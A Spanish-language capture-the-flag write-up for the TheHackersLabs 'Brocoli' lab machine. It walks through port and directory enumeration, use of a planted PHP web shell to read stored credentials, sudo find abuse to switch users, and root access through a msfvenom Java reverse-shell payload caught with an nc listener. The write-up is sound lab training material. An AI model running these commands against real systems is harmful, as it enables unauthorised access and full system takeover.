LaCaShItA
Avatar

Intro

Empezamos los CTF con Brocoli de TheHackersLabs

Enumeracion

Empezamos escaneando los puertos, para variar.

┌──(sml㉿ac1d4)-[~/ctf/thl/brocoli]
└─$ nmap -p- -Pn -sV -sS 192.168.1.111
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-06 06:23 EST
Nmap scan report for TheHackersLabs-Brocoli.home (192.168.1.111)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
MAC Address: 08:00:27:06:E0:1D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.75 seconds

Vemos que solo tiene el 22 y el 80 abiertos, asi que enumeramos el 80 mejor.

┌──(sml㉿ac1d4)-[~/ctf/thl/brocoli]
└─$ feroxbuster -u http://192.168.1.111 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
                                                                                                                                                                                                         
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.1.111/
 🚩  In-Scope Url          │ 192.168.1.111
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      316c http://192.168.1.111/uploads => http://192.168.1.111/uploads/
200      GET       22l      105w     5952c http://192.168.1.111/icons/ubuntu-logo.png
200      GET      364l      963w    10718c http://192.168.1.111/
200      GET        1l        1w       33c http://192.168.1.111/uploads/informebrocoli.txt
500      GET        0l        0w        0c http://192.168.1.111/uploads/brocoli.php
[####################] - 8s     62290/62290   0s      found:5       errors:0      
[####################] - 8s     62282/62282   8056/s  http://192.168.1.111/ 
[####################] - 0s     62282/62282   2707913/s http://192.168.1.111/uploads/ => Directory listing (add --scan-dir-listings to scan)

Encontramos el directorio /uploads.

http://192.168.1.111/uploads/

Si visitamos brocoli.php que está en ese directorio siempre da error 500.

http://192.168.1.111/uploads/brocoli.php

Enumeramos parametros de brocoli.php para ver si esconde algo raro:)

┌──(sml㉿ac1d4)-[~/tools]
└─$ ffuf -u http://192.168.1.111/uploads/brocoli.php?FUZZ=id -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -mc 200                                          

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.1.111/uploads/brocoli.php?FUZZ=id
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

cmd                     [Status: 200, Size: 54, Words: 3, Lines: 2, Duration: 18ms]
:: Progress: [4750/4750] :: Job [1/1] :: 3225 req/sec :: Duration: [0:00:01] :: Errors: 0 ::

Vemos que tiene el parametro cmd, asi que podemos ejecutar comandos a través de el. Antes de obtener una reverse shell, miramos los directorios “comunes” y vemos que /opt guarda algo…

http://192.168.1.111/uploads/brocoli.php?cmd=cat%20/opt/credenciales.txt
[+] Usuario: brocoli [+] Contraseña: ***

Brocoli -> Brocolon

Con esos credenciales nos conectamos por ssh. Ejecutamos sudo -l para ver que podemos hacer.

brocoli@TheHackersLabs-Brocoli:/tmp$ sudo -l
Matching Defaults entries for brocoli on TheHackersLabs-Brocoli:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User brocoli may run the following commands on TheHackersLabs-Brocoli:
    (brocolon) NOPASSWD: /usr/bin/find

Vemos que podemos usar find como brocolon asi que vamos a movernos!

brocoli@TheHackersLabs-Brocoli:~$ cd /tmp
brocoli@TheHackersLabs-Brocoli:/tmp$ sudo -u brocolon /usr/bin/find . -exec /bin/sh \; -quit
$ id
uid=1000(brocolon) gid=1000(brocolon) groups=1000(brocolon),4(adm),24(cdrom),30(dip),46(plugdev),101(lxd)

Brocolon -> Root

Ya como brocolon vemos otra vez con sudo -l si podemos hacer algo.

$ sudo -l
Matching Defaults entries for brocolon on TheHackersLabs-Brocoli:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User brocolon may run the following commands on TheHackersLabs-Brocoli:
    (ALL : ALL) NOPASSWD: /usr/bin/java

Ok, podemos usar java asi que en nuestra maquina creamos un payload para obtener una revshell como root. Ejecutamos:

msfvenom  -p java/shell_reverse_tcp LHOST=192.168.1.114 LPORT=4444 -f jar -o root.jar

El fichero resultante (root.jar) lo copiamos a la maquina objetivo.

──(sml㉿ac1d4)-[~/tools]
└─$ scp root.jar brocoli@192.168.1.111:/tmp
brocoli@192.168.1.111's password: 
root.jar                                                                                                                                      100% 7504     7.1MB/s   00:00

Ponemos en nuestra maquina nc a la escucha:

┌──(sml㉿ac1d4)-[~/ctf/thl/brocoli]
└─$ nc -nlvp 4444
listening on [any] 4444 ...

En la maquina objetivo lanzamos java para que ejecute nuestra revshell.

brocolon@TheHackersLabs-Brocoli:/tmp$ sudo -u root /usr/bin/java -jar /tmp/root.jar

Obtenemos root.

┌──(sml㉿ac1d4)-[~/ctf/thl/brocoli]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.1.114] from (UNKNOWN) [192.168.1.111] 53648
id
uid=0(root) gid=0(root) groups=0(root)
hostname
TheHackersLabs-Brocoli

Fin

Esta guapa la maquina de Wvverez, han estado bien los reyes magos.